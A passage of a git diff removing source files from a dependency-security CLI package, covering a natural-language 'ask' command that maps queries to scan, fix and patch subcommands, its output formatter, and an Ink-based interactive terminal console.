|| lowerQuery.includes('preview') - - // Extract package name from original query (not normalized). - let packageName: string | undefined - const quotedMatch = query.match(/['"]([^'"]+)['"]/) - if (quotedMatch) { - packageName = quotedMatch[1] - } else { - // Try to find package name after "is", "check", "about", "with". - // Must look like a real package (has @, /, or contains common package patterns). - const pkgMatch = query - .toLowerCase() - .match(/(?:is|check|about|with)\s+([a-z0-9-@/]+)/i) - if (pkgMatch) { - const candidate = pkgMatch[1] - // Only accept if it looks like a real package name (not common words). - if ( - candidate && - (candidate.includes('@') || - candidate.includes('/') || - candidate.match(/^[a-z0-9-]+$/)) - ) { - // Reject common command words. - const commonWords = [ - 'scan', - 'fix', - 'patch', - 'optimize', - 'vulnerabilities', - 'issues', - 'problems', - 'alerts', - 'security', - 'safe', - 'check', - ] - if (!commonWords.includes(candidate)) { - packageName = candidate - } - } - } - } - - // Detect severity. - let severity: string | undefined - for (const [level, keywords] of Object.entries(SEVERITY_KEYWORDS)) { - if ( - Array.isArray(keywords) && - keywords.some(kw => lowerQuery.includes(kw)) - ) { - severity = level - break - } - } - - // Detect environment. - let environment: string | undefined - for (const [env, keywords] of Object.entries(ENVIRONMENT_KEYWORDS)) { - if ( - Array.isArray(keywords) && - keywords.some(kw => lowerQuery.includes(kw)) - ) { - environment = env - break - } - } - - // Match against patterns. - let bestMatch: { - action: string - command: string[] - explanation: string - confidence: number - score: number - } | null = null - - for (const [action, pattern] of Object.entries(PATTERNS)) { - if (!pattern) { - continue - } - const matchCount = pattern.keywords.filter(kw => - lowerQuery.includes(kw), - ).length - - if (matchCount > 0) { - const confidence = matchCount / pattern.keywords.length - // Priority-weighted score: higher priority patterns win ties. - const score = confidence * (pattern.priority || 1) - - if (!bestMatch || score > bestMatch.score) { - bestMatch = { - action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence, - score, - } - } - } - } - - // Hybrid semantic matching: try multiple strategies if confidence is low. - if (!bestMatch || bestMatch.confidence < PATTERN_MATCH_THRESHOLD) { - // Strategy 1: Fast word-overlap matching (~0ms, 80-90% accuracy). - const wordMatch = await wordOverlapMatch(query) - - if (wordMatch && wordMatch.confidence > (bestMatch?.confidence || 0)) { - // Use word-overlap match. - const pattern = PATTERNS[wordMatch.action as keyof typeof PATTERNS] - if (pattern) { - bestMatch = { - action: wordMatch.action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence: wordMatch.confidence, - score: wordMatch.confidence, - } - } - } - - // Strategy 2: ONNX semantic matching (50-80ms, 95-98% accuracy). - // Only try if still low confidence. - if (!bestMatch || bestMatch.confidence < 0.5) { - const onnxMatch = await onnxSemanticMatch(query) - - if (onnxMatch && onnxMatch.confidence > (bestMatch?.confidence || 0)) { - // Use ONNX semantic match. - const pattern = PATTERNS[onnxMatch.action as keyof typeof PATTERNS] - if (pattern) { - bestMatch = { - action: onnxMatch.action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence: onnxMatch.confidence, - score: onnxMatch.confidence, - } - } - } - } - } - - // Default to scan if still no match. - if (!bestMatch) { - bestMatch = { - action: 'scan', - command: ['scan', 'create'], - explanation: 'Scanning your project', - confidence: 0.5, - score: 0.5, - } - } - - // Build final command with modifiers. - const command = [...bestMatch.command] - - // Add package name if detected and command supports it. - if (packageName && bestMatch.action === 'package') { - command.push(packageName) - } - - // Add severity flag. - if (severity && (bestMatch.action === 'fix' || bestMatch.action === 'scan')) { - command.push(`--severity=${severity}`) - } - - // Add environment flag. - if (environment === 'production' && bestMatch.action === 'scan') { - command.push('--prod') - } - - // Add dry run flag for destructive commands. - if ( - isDryRun || - (bestMatch.action === 'fix' && !lowerQuery.includes('execute')) - ) { - command.push('--dry-run') - } - - const result: ParsedIntent = { - action: bestMatch.action, - command, - confidence: bestMatch.confidence, - explanation: bestMatch.explanation, - isDryRun, - } - - if (packageName !== undefined) { - result.packageName = packageName - } - if (severity !== undefined) { - result.severity = severity - } - if (environment !== undefined) { - result.environment = environment - } - - return result -} - -/** - * Read package.json to get context. - */ -async function getProjectContext(cwd: string): Promise<{ - hasPackageJson: boolean - dependencies?: Record - devDependencies?: Record -}> { - try { - const pkgPath = path.join(cwd, 'package.json') - const content = await fs.readFile(pkgPath, 'utf8') - const pkg = JSON.parse(content) - return { - hasPackageJson: true, - dependencies: pkg.dependencies || {}, - devDependencies: pkg.devDependencies || {}, - } - } catch (_e) { - return { hasPackageJson: false } - } -} - -/** - * Main handler for ask command. - */ -export async function handleAsk(options: HandleAskOptions): Promise { - const { execute, explain, query } = options - - // Parse the intent. - const intent = await parseIntent(query) - - // Get project context. - const context = await getProjectContext(process.cwd()) - - // Show what we understood. - outputAskCommand({ - query, - intent, - context, - explain, - }) - - // If not executing, just show the command. - if (!execute) { - logger.log('') - logger.log('💡 Tip: Add --execute or -e to run this command directly') - return - } - - // Execute the command. - logger.log('') - logger.log('🚀 Executing...') - logger.log('') - - const result = await spawn('socket', intent.command, { - stdio: 'inherit', - cwd: process.cwd(), - }) - - if (result.code !== 0) { - logger.error(`Command failed with exit code ${result.code}`) - // eslint-disable-next-line n/no-process-exit - process.exit(result.code) - } -} diff --git a/packages/cli/src/commands/ask/output-ask.mts b/packages/cli/src/commands/ask/output-ask.mts deleted file mode 100644 index cf5207fb5..000000000 --- a/packages/cli/src/commands/ask/output-ask.mts +++ /dev/null @@ -1,192 +0,0 @@ -import colors from 'yoctocolors-cjs' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -const logger = getDefaultLogger() - -interface OutputAskCommandOptions { - query: string - intent: { - action: string - command: string[] - confidence: number - explanation: string - packageName?: string - severity?: string - environment?: string - isDryRun?: boolean - } - context: { - hasPackageJson: boolean - dependencies?: Record - devDependencies?: Record - } - explain: boolean -} - -/** - * Format the ask command output. - */ -export function outputAskCommand(options: OutputAskCommandOptions): void { - const { context, explain, intent, query } = options - - // Show the query. - logger.log('') - logger.log(colors.bold(colors.magenta('❯ You asked:'))) - logger.log(` "${colors.cyan(query)}"`) - logger.log('') - - // Show interpretation. - logger.log(colors.bold(colors.magenta('🤖 I understood:'))) - logger.log(` ${intent.explanation}`) - - // Show extracted details if present. - const details = [] - if (intent.packageName) { - details.push(`Package: ${colors.cyan(intent.packageName)}`) - } - if (intent.severity) { - const severityColor = - intent.severity === 'critical' || intent.severity === 'high' - ? colors.red - : intent.severity === 'medium' - ? colors.yellow - : colors.blue - details.push(`Severity: ${severityColor(intent.severity)}`) - } - if (intent.environment) { - details.push(`Environment: ${colors.green(intent.environment)}`) - } - if (intent.isDryRun) { - details.push(`Mode: ${colors.yellow('dry-run (preview only)')}`) - } - - if (details.length > 0) { - logger.log(` ${details.join(', ')}`) - } - - // Show confidence if low. - if (intent.confidence < 0.6) { - logger.log('') - logger.log( - colors.yellow( - '⚠️ Low confidence - the command might not match your intent exactly', - ), - ) - } - - logger.log('') - - // Show the command. - logger.log(colors.bold(colors.magenta('📝 Command:'))) - logger.log( - ` ${colors.green('$')} socket ${colors.cyan(intent.command.join(' '))}`, - ) - - // Show explanation if requested. - if (explain) { - logger.log('') - logger.log(colors.bold(colors.magenta('💡 Explanation:'))) - logger.log(explainCommand(intent)) - } - - // Show context. - if (context.hasPackageJson && explain) { - logger.log('') - logger.log(colors.bold(colors.magenta('📦 Project Context:'))) - const depCount = Object.keys(context.dependencies || {}).length - const devDepCount = Object.keys(context.devDependencies || {}).length - logger.log(` Dependencies: ${depCount} packages`) - logger.log(` Dev Dependencies: ${devDepCount} packages`) - } -} - -/** - * Explain what the command does. - */ -function explainCommand(intent: { - action: string - command: string[] - severity?: string - environment?: string - isDryRun?: boolean -}): string { - const parts = [] - - switch (intent.action) { - case 'scan': - parts.push(' • Creates a new security scan of your project') - parts.push(' • Analyzes all dependencies for vulnerabilities') - parts.push(' • Checks for supply chain attacks, typosquatting, etc.') - if (intent.severity) { - parts.push( - ` • Filters results to show only ${intent.severity} severity issues`, - ) - } - if (intent.environment === 'production') { - parts.push( - ' • Scans only production dependencies (not dev dependencies)', - ) - } - break - - case 'package': - parts.push(' • Checks the security score of a specific package') - parts.push(' • Shows alerts, vulnerabilities, and quality metrics') - parts.push(' • Provides a 0-100 score based on multiple factors') - break - - case 'fix': - parts.push(' • Applies package updates to fix GitHub security alerts') - parts.push(' • Updates vulnerable packages to safe versions') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows what would change without making changes', - ) - } else { - parts.push( - ' • WARNING: This will modify your package.json and lockfile', - ) - } - if (intent.severity) { - parts.push(` • Only fixes ${intent.severity} severity issues`) - } - break - - case 'patch': - parts.push(' • Directly patches code to remove CVEs') - parts.push(' • Applies surgical fixes to vulnerable code paths') - parts.push(' • Creates patch files in your project') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows available patches without applying them', - ) - } - break - - case 'optimize': - parts.push(' • Replaces dependencies with Socket registry alternatives') - parts.push( - ' • Uses enhanced versions with better security and performance', - ) - parts.push(' • Adds overrides to your package.json') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows recommendations without making changes', - ) - } - break - - case 'issues': - parts.push(' • Lists all detected issues in your dependencies') - parts.push(' • Shows severity, type, and affected packages') - if (intent.severity) { - parts.push(` • Filtered to ${intent.severity} severity issues only`) - } - break - - default: - parts.push(' • Runs the interpreted command') - } - - return parts.join('\n') -} diff --git a/packages/cli/src/commands/console/InteractiveConsoleApp.tsx b/packages/cli/src/commands/console/InteractiveConsoleApp.tsx deleted file mode 100644 index 68317abcd..000000000 --- a/packages/cli/src/commands/console/InteractiveConsoleApp.tsx +++ /dev/null @@ -1,820 +0,0 @@ -// @ts-nocheck -/** - * @fileoverview Interactive console for Socket CLI with AI-powered natural language processing. - * - * Layout: - * - Header: 6 lines (logo + metadata) - always visible - * - Console: Dynamic height, min 2 lines - scrollable output area - * - Input: Grows upward with Shift+Enter, max (termHeight - 9) - * - Status: 1 line - always visible at bottom - */ - -import { Box, Static, Text, useApp, useInput, useStdout } from 'ink' -import TextInput from 'ink-text-input' -import type React from 'react' -import { - createElement, - memo, - useCallback, - useEffect, - useMemo, - useState, -} from 'react' - -import { getAsciiHeader } from '../../utils/terminal/ascii-header-banner.mts' - -const TOP_SPACER_HEIGHT = 0 // Lines of spacing at top -const HEADER_HEIGHT = 6 // Logo (4) + info lines (2: divider + CLI info) -const MIN_CONSOLE_HEIGHT = 5 // Minimum lines to show in console -const STATUS_HEIGHT = 1 // Status content (1) -const MIN_INPUT_HEIGHT = 1 // Minimum visible lines for input -const MAX_INPUT_HEIGHT_RATIO = 0.4 // Max 40% of terminal height -const _GAP_HEIGHT = 0 // No gaps - boxes touch each other - -// Disable shimmer until Ink rendering issues resolved. -const _shouldDisableAnimations = true -const _SHIMMER_INTERVAL = 100 // ms between frames (smooth animation) - -type _FocusArea = 'console' | 'input' - -export interface DiffLine { - type: 'addition' | 'removal' | 'context' - content: string -} - -export interface ConsoleMessage { - text: string - timestamp: Date - diff?: DiffLine[] - dimmed?: boolean // Dim less important messages. -} - -/** - * Create diff lines for package changes (legacy format). - */ -export function createPackageChangeDiff( - changes: { - package: string - before: string - after: string - reason?: string - }[], -): DiffLine[] { - const lines: DiffLine[] = [] - - for (const change of changes) { - // Package name (context). - lines.push({ - content: change.package, - type: 'context', - }) - - // Before version (removal). - lines.push({ - content: ` ${change.before}`, - type: 'removal', - }) - - // After version (addition). - lines.push({ - content: ` ${change.after}`, - type: 'addition', - }) - - // Reason (context). - if (change.reason) { - lines.push({ - content: ` → ${change.reason}`, - type: 'context', - }) - } - - // Spacing. - lines.push({ - content: '', - type: 'context', - }) - } - - return lines -} - -/** - * Create file diff lines from before/after content. - * Shows unified diff format with line numbers and context. - */ -export function createFileDiff( - beforeContent: string, - afterContent: string, - _contextLines = 3, -): DiffLine[] { - const beforeLines = beforeContent.split('\n') - const afterLines = afterContent.split('\n') - const diffLines: DiffLine[] = [] - - // Simple line-by-line diff (for demo purposes). - // In production, use a proper diff algorithm like Myers diff. - const maxLines = Math.max(beforeLines.length, afterLines.length) - - for (let i = 0; i < maxLines; i++) { - const beforeLine = beforeLines[i] - const afterLine = afterLines[i] - - if (beforeLine === afterLine) { - // Context line (unchanged). - if (beforeLine !== undefined) { - diffLines.push({ - content: beforeLine, - type: 'context', - }) - } - } else { - // Lines differ - show removal then addition. - if (beforeLine !== undefined) { - diffLines.push({ - content: beforeLine, - type: 'removal', - }) - } - if (afterLine !== undefined) { - diffLines.push({ - content: afterLine, - type: 'addition', - }) - } - } - } - - return diffLines -} - -export interface InteractiveConsoleAppProps { - buildHash?: string - devMode?: boolean - onCommand?: ( - command: string, - addMessage: (textOrMessage: string | ConsoleMessage) => void, - ) => Promise - version?: string -} - -/** - * Header component - renders once, never updates. - */ -const _StaticHeader = memo( - function StaticHeader({ - buildHash: _buildHash, - devMode: _devMode, - version: _version, - }: { - version?: string - buildHash?: string - devMode?: boolean - }): React.ReactElement { - const headerContent = useMemo( - () => getAsciiHeader('console', undefined, false, {}), - [], - ) - - return createElement( - Box, - { flexDirection: 'column', flexShrink: 0, paddingX: 2 }, - createElement(Text, {}, headerContent), - ) - }, - () => true, // Never re-render -) - -/** - * Console output area - simplified. - */ -const _ConsoleOutput = memo(function ConsoleOutput({ - messages, -}: { - messages: ConsoleMessage[] -}): React.ReactElement { - return createElement( - Box, - { - flexDirection: 'column', - flexGrow: 1, - flexShrink: 0, - paddingX: 1, - }, - // Use Static to render messages - prevents re-rendering existing messages (no flicker). - createElement( - Static, - { items: messages }, - (msg: ConsoleMessage, i: number) => { - const elements = [] - - // Main message text with subtle green tint for console feel. - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - elements.push( - createElement( - Text, - { - key: `msg-${i}`, - color: isCommandOutput ? '#86EFAC' : undefined, - dimColor: msg.dimmed || false, - }, - msg.text, - ), - ) - - // Render diff if present with line numbers and background highlighting. - if (msg.diff) { - // Calculate max line number width for alignment. - const maxLineNum = msg.diff.length - const lineNumWidth = String(maxLineNum).length - - for (const [diffIdx, line] of msg.diff.entries()) { - const lineNum = (diffIdx + 1).toString().padStart(lineNumWidth, ' ') - let bgColor: string | undefined - let color: string - let dimColor: boolean - let prefix: string - - switch (line.type) { - case 'addition': - bgColor = '#1A3A1A' // Dark green background. - color = '#E0E0E0' // Light gray text (readable on dark green). - prefix = '+' - dimColor = false - break - case 'removal': - bgColor = '#3A1A2A' // Dark pink background. - color = '#E0E0E0' // Light gray text (readable on dark pink). - prefix = '-' - dimColor = false - break - case 'context': - bgColor = undefined // No background for context. - color = '#6B7280' // Dim gray text. - prefix = ' ' - dimColor = true - break - } - - elements.push( - createElement( - Text, - { - key: `diff-${i}-${diffIdx}`, - backgroundColor: bgColor, - color, - dimColor, - }, - ` ${lineNum} ${prefix} ${line.content}`, - ), - ) - } - } - - // Return Box with all elements. - return createElement( - Box, - { key: i, flexDirection: 'column' }, - ...elements, - ) - }, - ), - ) -}) - -/** - * Input area - simplified. - */ -const InputArea = memo( - function InputArea({ - commandHistory, - height: _height, - isFocused, - onHeightChange, - onSubmit, - }: { - commandHistory: string[] - height: number - isFocused: boolean - onHeightChange: (lineCount: number) => void - onSubmit: (command: string) => void - }): React.ReactElement { - // Internal state - isolated from parent. - const [value, setValue] = useState('') - const [historyIndex, setHistoryIndex] = useState(-1) - - // Notify parent of height changes once on mount (always 1 line). - useEffect(() => { - onHeightChange(1) - // eslint-disable-next-line react-hooks/exhaustive-deps - }, [onHeightChange]) - - // Handle up/down arrow navigation for command history. - useInput((_input, key) => { - // Only accept input when this area is focused. - if (!isFocused) { - return - } - - // Up arrow: Navigate backward in history. - if (key.upArrow) { - if (commandHistory.length > 0) { - const newIndex = historyIndex + 1 - if (newIndex < commandHistory.length) { - setHistoryIndex(newIndex) - const historicalCommand = - commandHistory[commandHistory.length - 1 - newIndex]! - setValue(historicalCommand) - } - } - return - } - - // Down arrow: Navigate forward in history. - if (key.downArrow) { - if (historyIndex > 0) { - const newIndex = historyIndex - 1 - setHistoryIndex(newIndex) - const historicalCommand = - commandHistory[commandHistory.length - 1 - newIndex]! - setValue(historicalCommand) - } else if (historyIndex === 0) { - setHistoryIndex(-1) - setValue('') - } - return - } - }) - - // Handle command submission. - const handleSubmit = useCallback( - (submittedValue: string) => { - const command = submittedValue.trim() - if (command) { - onSubmit(command) - setHistoryIndex(-1) - setValue('') - } - }, - [onSubmit], - ) - - return createElement( - Box, - { - borderBottom: true, - borderColor: isFocused ? '#7B5FBF' : '#3F3F3F', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'row', - flexShrink: 0, - paddingX: 1, - }, - createElement(Text, { color: isFocused ? '#B0B0B0' : '#5A5A5A' }, '> '), - isFocused - ? createElement(TextInput, { - onChange: setValue, - onSubmit: handleSubmit, - value, - }) - : createElement( - Text, - { color: isFocused ? '#B0B0B0' : '#5A5A5A' }, - value, - ), - ) - }, - (prevProps, nextProps) => prevProps.isFocused === nextProps.isFocused, // Re-render if focus state changes -) - -/** - * Readonly gray input area for displaying latest message. - */ -function _InputAreaGray({ message }: { message: string }): React.ReactElement { - const [displayMessage, setDisplayMessage] = useState(message) - - useEffect(() => { - setDisplayMessage(message) - }, [message]) - - return createElement( - Box, - { - borderBottom: true, - borderColor: '#6B7280', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'row', - flexShrink: 0, - paddingX: 1, - }, - createElement(Text, {}, displayMessage), - ) -} - -/** - * Status bar - shows status and Ctrl+C exit prompt. - */ -const StatusBar = memo( - function StatusBar({ - ctrlCPressed, - }: { - ctrlCPressed: boolean - }): React.ReactElement { - const statusText = ctrlCPressed ? 'Press Ctrl+C again to exit' : '◇ Ready' - const statusColor = ctrlCPressed ? 'gray' : 'gray' - - return createElement( - Box, - { - alignItems: 'flex-start', - flexShrink: 0, - height: 1, - justifyContent: 'flex-start', - paddingX: 1, - }, - createElement( - Text, - { color: statusColor, dimColor: !ctrlCPressed }, - statusText, - ), - ) - }, - (prevProps, nextProps) => prevProps.ctrlCPressed === nextProps.ctrlCPressed, // Re-render if ctrlCPressed changes -) - -/** - * Main interactive console application. - */ -const InteractiveConsoleAppComponent = function InteractiveConsoleApp({ - buildHash: _buildHash, - devMode: _devMode, - onCommand, - version: _version, -}: InteractiveConsoleAppProps): React.ReactElement { - const { exit } = useApp() - const { stdout } = useStdout() - - const [commandHistory, setCommandHistory] = useState([]) - const [ctrlCPressed, setCtrlCPressed] = useState(false) - const [ctrlCTimestamp, setCtrlCTimestamp] = useState(0) - const [grayBoxScrollOffset, setGrayBoxScrollOffset] = useState(0) - const [hasExecutedCommand, setHasExecutedCommand] = useState(false) - const [inputLineCount, setInputLineCount] = useState(1) - const [messages, setMessages] = useState([]) - const [focused, setFocused] = useState<'input' | 'gray'>('input') - - // Callback to add messages to console (memoized to prevent creating new function on every render). - const addMessage = useCallback((textOrMessage: string | ConsoleMessage) => { - if (typeof textOrMessage === 'string') { - setMessages(prev => [ - ...prev, - { text: textOrMessage, timestamp: new Date() }, - ]) - } else { - setMessages(prev => [...prev, textOrMessage]) - } - // Reset scroll offset to show latest messages. - setGrayBoxScrollOffset(0) - }, []) - - // Calculate dynamic heights - input grows with content, console shrinks. - // Memoize to prevent recalculation on every render. - const termHeight = useMemo(() => stdout.rows || 30, [stdout.rows]) - - const heights = useMemo(() => { - const maxInputHeight = Math.floor(termHeight * MAX_INPUT_HEIGHT_RATIO) - - // Input height = number of lines (no borders). - const inputHeight = Math.max( - MIN_INPUT_HEIGHT, - Math.min(inputLineCount, maxInputHeight), - ) - - // Total fixed heights. - const fixedHeights = TOP_SPACER_HEIGHT + HEADER_HEIGHT + STATUS_HEIGHT - - // Remaining space for console + input. - const dynamicSpace = termHeight - fixedHeights - - // Console gets remainder after input. - const consoleHeight = Math.max( - MIN_CONSOLE_HEIGHT, - dynamicSpace - inputHeight, - ) - - return { consoleHeight, inputHeight } - }, [inputLineCount, termHeight]) - - const { consoleHeight, inputHeight } = heights - - // TODO: Mouse click detection for focus switching. - // Current challenge: When we enable ANSI mouse tracking escape codes, - // the terminal sends mouse events as escape sequences on stdin (e.g., \x1b[<0;17;35M). - // Both our stdin.on('data') handler AND Ink's useInput see the same data. - // Ink doesn't recognize these as mouse events, so it treats them as text input, - // causing escape sequences to appear in the input field. - // - // Potential solutions: - // 1. Fork Ink to add native mouse support - // 2. Use stdin.setRawMode(true) and handle ALL input ourselves (major refactor) - // 3. Pre-filter stdin before Ink sees it (requires patching Node.js stream) - // 4. Use a blessed/blessed-contrib approach with complete terminal control - // - // For now: Use Tab key to switch focus (works perfectly). - // Future: Implement proper mouse support when we have time for the refactor. - - // Callbacks for InputArea (memoized to prevent re-renders). - const handleInputHeightChange = useCallback((lineCount: number) => { - setInputLineCount(prevCount => { - // Only update if actually changed to prevent unnecessary re-renders. - if (prevCount !== lineCount) { - return lineCount - } - return prevCount - }) - }, []) - - const handleInputSubmit = useCallback( - (command: string) => { - // Mark that we've executed a command (show gray box now). - setHasExecutedCommand(true) - - // Handle clear command. - if (command.toLowerCase().trim() === 'clear') { - setMessages([]) - setCommandHistory(prev => [...prev, command]) - return - } - - // Add to history (always append, never mutate). - setCommandHistory(prev => [...prev, command]) - - // Echo command. - addMessage(`> ${command}`) - - // Execute. - if (onCommand) { - onCommand(command, addMessage) - } - }, - [onCommand, addMessage], - ) - - // Keyboard input handling. - useInput((input, key) => { - // Tab: Cycle focus between input and gray box. - if (key.tab) { - setFocused(prev => (prev === 'input' ? 'gray' : 'input')) - // Reset scroll offset when switching to grey box. - setGrayBoxScrollOffset(0) - return - } - - // Grey box scrolling with up/down arrows. - if (focused === 'gray') { - const nonEmptyMessages = messages.filter(msg => msg.text.length > 0) - const maxOffset = Math.max(0, nonEmptyMessages.length - 1) - - if (key.upArrow) { - setGrayBoxScrollOffset(prev => Math.min(prev + 1, maxOffset)) - return - } - - if (key.downArrow) { - setGrayBoxScrollOffset(prev => Math.max(prev - 1, 0)) - return - } - } - - // Ctrl+C: First press shows warning, second press exits. - if (key.ctrl && input === 'c') { - const now = Date.now() - - // Second press must be at least 100ms after first (prevent key repeat). - if (ctrlCPressed && now - ctrlCTimestamp >= 100) { - // Second press - exit. - exit() - return - } - - // First press - set state for second press check. - setCtrlCPressed(true) - setCtrlCTimestamp(now) - return - } - - // Reset Ctrl+C state on any other key. - if (ctrlCPressed) { - setCtrlCPressed(false) - } - }) - - // Auto-dismiss Ctrl+C warning after 2 seconds. - useEffect(() => { - if (!ctrlCPressed) { - return - } - - const timeout = setTimeout(() => { - setCtrlCPressed(false) - }, 2000) - - return () => { - clearTimeout(timeout) - } - }, [ctrlCPressed]) - - // Get ASCII header with all version and org info. - const headerContent = useMemo( - () => getAsciiHeader('console', undefined, false, {}), - [], - ) - - // Combine header, welcome messages, and command messages into one Static items array. - const headerLines = headerContent.split('\n') - const welcomeLines = [ - ' ', - 'Welcome to Socket CLI interactive mode!', - 'Type commands or use natural language.', - 'Try: "scan", "ls", "whoami", or any socket command', - ' ', - ] - const headerItems = [...headerLines, ...welcomeLines] - - // Messages without wrapping - just show as-is - const wrappedMessages: Array<{ text: string; isCommandOutput: boolean }> = [] - for (const msg of messages) { - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - wrappedMessages.push({ isCommandOutput, text: msg.text }) - } - - const _allItems = [...headerItems, ...wrappedMessages] - - return createElement( - Box, - { flexDirection: 'column', minHeight: 0 }, - - // Console area. - createElement( - Box, - { - flexDirection: 'column', - flexGrow: 1, - flexShrink: 1, - minHeight: 0, - paddingX: 2, - }, - // Header section (logo + welcome). - createElement( - Static, - { items: headerItems }, - (item: string, i: number) => { - const isHeaderLine = i < headerLines.length - const isWelcomeMessage = !isHeaderLine - return createElement( - Text, - { - key: i, - color: isWelcomeMessage ? '#86EFAC' : undefined, - }, - item, - ) - }, - ), - ), - - // Readonly gray input box with command log (shown only after first command executed). - hasExecutedCommand - ? createElement( - Box, - { - borderBottom: true, - borderColor: focused === 'gray' ? '#7B5FBF' : '#3F3F3F', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'column', - flexGrow: 0, - flexShrink: 0, - height: Math.max(5, Math.min(Math.floor(consoleHeight * 0.85), 25)), - paddingX: 1, - paddingY: 0, - }, - // Check if showing default text. - (() => { - const nonEmptyMessages = messages.filter(msg => msg.text.length > 0) - if (nonEmptyMessages.length === 0) { - return createElement( - Text, - { color: focused === 'gray' ? '#B0B0B0' : '#5A5A5A' }, - 'Waiting for command output…', - ) - } - - // Apply scroll offset: show messages from start up to (length - offset). - // Limit to max 21 visible messages to prevent height overflow. - const maxVisibleMessages = 21 - const visibleMessages = nonEmptyMessages.slice( - Math.max( - 0, - nonEmptyMessages.length - - maxVisibleMessages - - grayBoxScrollOffset, - ), - nonEmptyMessages.length - grayBoxScrollOffset, - ) - const currentPosition = Math.max( - 1, - nonEmptyMessages.length - grayBoxScrollOffset, - ) - const totalMessages = nonEmptyMessages.length - - return createElement( - Box, - { - flexDirection: 'column', - flexShrink: 0, - height: '100%', - minWidth: 0, - }, - // Scrollable content area (grows to fill available space). - createElement( - Box, - { flexDirection: 'column', flexGrow: 1, minWidth: 0 }, - ...visibleMessages.map((msg, i) => { - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - const isFocused = focused === 'gray' - return createElement( - Text, - { - key: i, - color: isFocused - ? isCommandOutput - ? '#86EFAC' - : '#B0B0B0' - : isCommandOutput - ? '#86EFAC' - : '#5A5A5A', - }, - msg.text, - ) - }), - ), - // Footer with scroll position indicator and navigation hint (stays at bottom). - createElement( - Box, - { - flexDirection: 'row', - justifyContent: 'space-between', - width: '100%', - }, - createElement( - Text, - { color: focused === 'gray' ? '#7B5FBF' : '#3A3A3A' }, - `[${currentPosition}/${totalMessages}]`, - ), - createElement( - Text, - { color: focused === 'gray' ? '#7B5FBF' : '#3A3A3A' }, - '↑/↓', - ), - ), - ) - })(), - ) - : null, - - // Input at bottom. - createElement(InputArea, { - commandHistory, - height: inputHeight, - isFocused: focused === 'input', - onHeightChange: handleInputHeightChange, - onSubmit: handleInputSubmit, - }), - - // Status bar at very bottom. - createElement(StatusBar, { ctrlCPressed }), - ) -} - -// Export memoized version to prevent unnecessary re-renders. -export const InteractiveConsoleApp = memo(InteractiveConsoleAppComponent) diff --git a/packages/cli/src/commands/console/cmd-console.mts b/packages/cli/src/commands/console/cmd-console.mts deleted file mode 100644 index d36cd721c..000000000 --- a/packages/cli/src/commands/console/cmd-console.mts +++ /dev/null @@ -1,73 +0,0 @@ -import { handleConsole } from './handle-console.mts' -import { commonFlags } from '../../flags.mts' -import { meowOrExit } from '../../utils/cli/with-subcommands.mjs' -import { - getFlagApiRequirementsOutput, - getFlagListOutput, -} from '../../utils/output/formatting.mts' - -import type { - CliCommandConfig, - CliCommandContext, -} from '../../utils/cli/with-subcommands.mjs' - -export const CMD_NAME = 'console' - -const description = 'Interactive console with AI-powered natural language' - -const hidden = false - -export const cmdConsole = { - description, - hidden, - run, -} - -async function run( - argv: string[] | readonly string[], - importMeta: ImportMeta, - { parentName }: CliCommandContext, -): Promise { - const config: CliCommandConfig = { - commandName: CMD_NAME, - description, - flags: { - ...commonFlags, - banner: { - type: 'boolean', - default: false, - description: 'Hide the banner at startup.', - hidden: true, - }, - }, - help: (command, config) => ` - Usage - $ ${command} - - API Token Requirements - ${getFlagApiRequirementsOutput(`${parentName}:${CMD_NAME}`)} - - Options - ${getFlagListOutput(config.flags)} - - Examples - $ ${command} - - Tips - - Ask questions in natural language - - Use Tab to switch between console and input - - Press Shift+Enter for multi-line input - - Press Ctrl-C again to exit - `, - hidden, - } - - meowOrExit({ - argv, - config, - importMeta, - parentName, - }) - - await handleConsole() -} diff --git a/packages/cli/src/commands/console/handle-console.mts b/packages/cli/src/commands/console/handle-console.mts deleted file mode 100644 index 6d5d040e3..000000000 --- a/packages/cli/src/commands/console/handle-console.mts +++ /dev/null @@ -1,339 +0,0 @@ -import { render } from 'ink' -import { createElement } from 'react' -import colors from 'yoctocolors-cjs' - -import { spawn } from '@socketsecurity/lib-internal/spawn' - -import { - createFileDiff, - InteractiveConsoleApp, -} from './InteractiveConsoleApp.js' -import { parseIntent } from '../ask/handle-ask.mts' - -import type { ConsoleMessage } from './InteractiveConsoleApp.js' - -// Read package.json for version info. -async function getVersionInfo(): Promise<{ - version: string - buildHash?: string - devMode: boolean -}> { - try { - const pkgPath = new URL('../../../package.json', import.meta.url) - const { default: pkg } = await import(pkgPath.href, { - with: { type: 'json' }, - }) - return { - buildHash: process.env['SOCKET_CLI_BUILD_HASH'] || 'local', - devMode: process.env['NODE_ENV'] === 'development', - version: pkg.version || 'dev', - } - } catch (_e) { - return { - buildHash: 'local', - devMode: true, - version: 'dev', - } - } -} - -/** - * Set up raw mode for keyboard input (without mouse tracking). - * Note: Mouse tracking is incompatible with terminal text selection. - * Use Tab to switch focus instead of clicking. - */ -function setupRawMode(): void { - // Note: Ink handles keyboard input via useInput, so raw mode setup is minimal. - // The terminal is already in the right state for Ink's input handling. - // This function is kept for potential future extensions. -} - -/** - * Restore terminal to normal mode. - */ -function restoreTerminalMode(): void { - // Terminal restoration is handled by Ink automatically. - // This function is kept for potential future extensions. -} - -/** - * Handle console command - launches interactive TUI. - */ -export async function handleConsole(): Promise { - // Switch to alternate screen buffer and hide cursor. - process.stdout.write('\x1B[?1049h\x1B[?25l') - - // Set up raw mode and mouse tracking. - setupRawMode() - - // Get version info. - const versionInfo = await getVersionInfo() - - // Command handler - executes both console commands and socket commands. - const handleCommand = async ( - command: string, - 